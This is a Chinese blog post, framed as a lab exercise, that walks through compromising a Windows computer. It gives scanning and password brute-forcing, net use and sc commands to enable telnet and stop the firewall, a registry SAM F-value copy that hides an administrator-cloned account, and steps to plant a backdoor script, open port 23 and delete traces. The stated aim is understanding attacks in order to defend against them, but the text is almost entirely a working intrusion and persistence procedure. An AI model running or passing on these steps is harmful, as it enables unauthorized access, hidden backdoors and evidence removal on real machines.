模拟黑客攻击
原创
©著作权归作者所有:来自51CTO博客作者乐园园的原创作品,请联系作者获取转载授权,否则将追究法律责任
实验名称:模拟黑客攻击计算机
实验需求描述 :通过模拟攻击实验明白黑客攻击原理,做好防范。
试验步骤:
一:扫描目标计算机
使用扫描软件扫描目标计算机,确定开放的端口,判断操作系统的类型。
扫描软件推荐使用X-Scan,SuperScan,Nmap和流光
在这里使用X-Scan
二:获得管理权限
根据扫描结果,尝试暴力破解管理员账户的密码。X-Scan,流光,LC5等软件都提供了暴力破解功能,破解后会自动生成报告
三:入侵目标计算机(必须知道了破解了密码,否则一切免谈)
1. 使用管理员的账户建立IPC链接,命令为“net use \\对方IP 密码 /user:administrator”
1. 使用sc命令目标计算机的所有服务列表,并保存到本地,命令为“sc \对方IP query type= service state= all >c:\yue.txt”
到c盘,打开yue.txt文件,找到telnet,确认telnet的服务状态(默认为禁用状态)
如果知道telnet的服务名称,可以直接使用命令行查看,命令为“sc \\IP qc tlntsvr”
去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\IP config tlntsvr start= auto”.
1. 然后启用telnet服务,命令为“sc \\IP start tlntsvr”.
停用目标计算机的windows防火墙,命令为“sc \\IP stop sharedaccess”.
确认目标计算机启用了远程注册表服务,命令为“sc \\IP qc romoteregistry”如果该服务为停用状态,则启用。
四:添加隐藏用户
1.建立telnet连接,管理目标计算机,命令为“telnet IP”连接成功后输入管理员的账户和密码
通过telnet,在目标计算机上建立隐藏账户,命令为“net user 名字$ 密码/add”.
在本地运行“RegEdit”,在注册表编辑器中选择“文件-连接网络注册表”在选择计算机的窗口中输入目标计算机的地址,并提供目标计算机的用户名和密码。
打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE”项下的“SAM”项下的“SAM”选择“权限”
在SAN权限窗口中,赋予管理员完全控制权限,断开与目标计算机的连接,然后重新建立连接。
展开目标计算机的
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\User\Name”项,找到“administrator”和新建的用户“yezi$”,记录他们的类型。
展开目标计算机
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位1F4的子项,该项和administrator相对应
双击右侧窗格1F4下的F键值,复制F值下的全部数据
展开目标计算机
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位3EE的子项,使用从1F4项复制的数据覆盖3EE项F键值的数据
导出目标计算机注册表的yezi$项和000003EE项保存到本地,并命名一下,后缀是.reg格式。
返回到telnet命令行,删除目标计算机的账户yezi$,命令为“net user yezi$/delete”.
在目标计算机上导入yezi1.reg和yezi.reg.命令为“reg import yezi1.reg和reg import yezi2.reg”.完成本步后将真正的在目标计算机上建立一个隐藏用户。使用命令行或图形工具都不能查看到,但在注册表中可以看见。
打开目标计算机的注册表,右击
“HKEY_LOCAL_MACHINE\SAM\SAM”选择“权限”取出管理员的读取和完全控制权限,恢复到默认状态。
五:保留管理后门,隐藏攻击痕迹。
在本地建立一个名为open23.bat的脚本文件,内容
如下;将其拷贝到“\\目标IP\C$下。
建立telnet连接,进入目标计算机的C盘运行open23.bat脚本。运行成功后重新启动windows防火墙,并且开启TCP和UDP的23端口以允许telnet连接通过防火墙,
最后,删除目标计算机上的遗留文件,如;open23.bat.从此以后,可以在目标计算机上来去自如,跟主人一样。
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
模拟长按模拟长按模拟长按模拟长按
不一定对,没测试 记录一下。
java servlet 开发语言 ide -
【模拟】模拟junit测试
Mock 测试Mock 测试就是在测试过程中,创建一个假的对象,避
spring 自定义 构造方法